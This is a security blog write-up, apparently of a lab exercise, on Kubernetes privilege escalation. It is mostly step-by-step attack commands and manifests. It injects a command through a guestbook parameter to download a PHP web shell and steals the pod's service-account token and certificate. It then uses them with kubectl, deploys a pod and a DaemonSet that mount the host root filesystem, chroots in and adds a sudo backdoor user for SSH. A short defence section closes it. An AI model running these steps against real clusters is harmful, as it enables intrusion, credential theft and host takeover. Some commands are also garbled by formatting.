[ Home ] [ Writeups ] [ Articles ] [ Cheatsheets ] [ CVE ] [ EOF ]


.:: [KUBERNETES] Exploitation 1 ::.
Title : [KUBERNETES] Exploitation 1
Author : Cabir  
Date : Friday, Sep 13, 2019
Modified : Friday, Sep 13, 2019
Reading time: 1 minutes and 8 seconds.

-=[Privilege escalation with malicious pod]=-

# Find Vulnerability

1http://10.23.58.40:31600/guestbook.php?cmd=set&key=message&value=test 
2http://10.23.58.40:31600/guestbook.php?cmd=set&key=command&value=curl%20https://raw.githubusercontent.com/artyuum/Simple-PHP-Web-Shell/master/ index.php%20 --output%20shell.php

# Download WebShell with RCE

1curl https://github.com/artyuum/Simple-PHP-Web-Shell --output shell.php` 

# Collect Data

1cat /run/secrets/kubernetes.io/serviceaccount/ca.crt cat /run/secrets/kubernetes.io/serviceaccount/token cat /run/secrets/kubernetes.io/serviceaccount/namespace` 

# List pods

1./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 get pods

# Check if I have permission to exec command in pods#

1./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 auth can-i exec pods

# Exec an interactive shell in the pods

1./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 exec -it frontend-586dd8d476-cb8nc /bin/bash

# Downlaod kubectl binary:

1curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/ linux/amd64/kubectl

# Prompt Color: (User Friendly)

1PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033 [01;34m\]\w\[\033[00m\]\$ ' 

# Export Token in $TOKEN:

1export TOKEN=`cat /run/secrets/kubernetes.io/serviceaccount/token`

# Setup alias:

1alias kubectl="/data/kubectl --token=$TOKEN --certificate-authority=/run/secrets/kubernetes.io/serviceaccount/ca.crt --server=https://10.23.58.40:6443"` 

# Create a Malicious Pods to steal the host / (Read)

 1  apiVersion: v1
 2  kind: Pod
 3  metadata:
 4  name: attack-pod
 5  namespace: default
 6  spec:
 7  containers:
 8  - image: janeczku/alpine-kubernetes
 9  imagePullPolicy: IfNotPresent
10  name: attack-container
11  volumeMounts:
12  - mountPath: /root
13  name: mount-host-root-into-mnt-pods
14  volumes:
15  - name: mount-host-root-into-mnt-pods
16  hostPath:
17  path: /

# Use a malicious daemonset pod to have access on all nodes

 1apiVersion: apps/v1
 2  kind: DaemonSet
 3  metadata:
 4  name: attack-daemonset
 5  labels:
 6  app: attack-daemonset
 7  spec:
 8  selector:
 9  matchLabels:
10  app: attack-daemonset
11  template:
12  metadata:
13  labels:
14  app: attack-daemonset
15  spec:
16  containers:
17  - name: alpine-attack
18  image: janeczku/alpine-kubernetes
19  volumeMounts:
20  - mountPath: /root
21  name: mount-host-root-into-mnt-pods
22  volumes:
23  - name: mount-host-root-into-mnt-pods
24  hostPath:
25  path: /

# Exec a shell in the attack-pod

1./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 exec -it attack-pod /bin/sh

# Chroot host file system

1chroot /root /bin/bash 

# Add a new user to ssh into the node

1adduser owned adduser owned sudo` 

# Retrieve host IP

1cat /root/etc/network/interfaces` 

# KVM uses ens3

1auto ens3 iface ens3 inet static address 10.23.58.40 <---- netmask 255.255.255.0 gateway 10.23.58.2 dns-nameservers 10.23.58.2 

# Connect to ssh to the host (Node)

1ssh owned@\[node-ip\] 

# Defending

1-Create a service account for redis
2-Create a Role to only get pods 
3-Create a Role Binding for that (give the redis service account Role to only get pods) 
4-Restart all redis pods 

# Sources Inguardians - Bust A Kube


[ Home ] [ Writeups ] [ Articles ] [ Cheatsheets ] [ CVE ] [ EOF ]